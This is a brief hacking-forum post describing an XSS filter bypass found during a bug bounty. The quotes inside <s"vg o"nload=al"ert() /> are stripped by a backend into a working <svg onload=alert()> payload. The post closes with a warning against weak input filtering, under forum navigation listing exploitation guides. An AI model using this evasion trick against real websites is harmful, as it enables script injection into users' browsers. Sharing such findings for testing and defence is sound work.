Found an XSS bypass during a bug bounty

by x32x01 || Sep 19, 2025

Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<svg onload=alert()>

Never Rely on Poor Input Filtering !

Related Threads

Just tested the backend of a tool I’ve been building

x32x01
Jul 21, 2025

Replies: 0

Views: 333

Jul 21, 2025

x32x01

OverTheWire: "Bandit" Solutions

x32x01
Jan 12, 2024

Replies: 0

Views: 1K

Jan 12, 2024

x32x01

Nikto Web Server Scanner Guide for Security

x32x01
Jan 12, 2024

Replies: 0

Views: 1K

Jan 12, 2024

x32x01

SQLMap Command Generator - Save Testers Time!

x32x01
Jul 21, 2025

Replies: 0

Views: 331

Jul 21, 2025

x32x01

Log4jshell Vulnerability: What You Need to Know

x32x01
Jan 12, 2024

Replies: 0

Views: 910

Jan 12, 2024

x32x01

Register & Login Faster

Latest Posts

Buffer Overflow Exploitation Deep Dive Guide
- Latest: x32x01
- Yesterday at 20:05
General PC Hacking Forum
SSRF to RCE Advanced Exploitation Guide For Hackers
- Latest: x32x01
- Yesterday at 19:02
WebSite & Server Hacking Forum
React2Shell Attack Turning React Bugs into RCE
- Latest: x32x01
- Dec 8, 2025
WebSite & Server Hacking Forum
JavaScript Recon Guide for Ethical Hackers
- Latest: x32x01
- Nov 28, 2025
Programming Languages Forum
Advanced CSRF Bug Hunting Guide for Pros
- Latest: x32x01
- Nov 28, 2025
WebSite & Server Hacking Forum
PHP 8.5 Features for Faster Backend Development
- Latest: x32x01
- Nov 21, 2025
PHP Language Forum
Critical Windows JPEG RCE Threat Explained
- Latest: x32x01
- Nov 21, 2025
Books & Tutorials Hacking Forum
Complete Roadmap to Learn Ethical Hacking Fast
- Latest: x32x01
- Nov 21, 2025
Books & Tutorials Hacking Forum
Install theHarvester on Ubuntu 18.04 Easily
- Latest: x32x01
- Nov 20, 2025
Hacking Tools & Software Forum

Latest Resources

Microsoft Windows 11 Pro 25H2 x64 bit
- x32x01
- Updated: Sep 16, 2025
Active Directory Security Guide
- x32x01
- Updated: Mar 8, 2024
191 Security Analyst Interview Questions
- x32x01
- Updated: Mar 8, 2024
Terms Every SOC - CyberSecurity Analyst Should Know
- x32x01
- Updated: Mar 7, 2024
Caido - web security auditing toolkit
- x32x01
- Updated: Feb 23, 2024

Forum Statistics

Threads: 667

Messages: 676

Members: 68

Latest Member: Ahsan123

Back

Top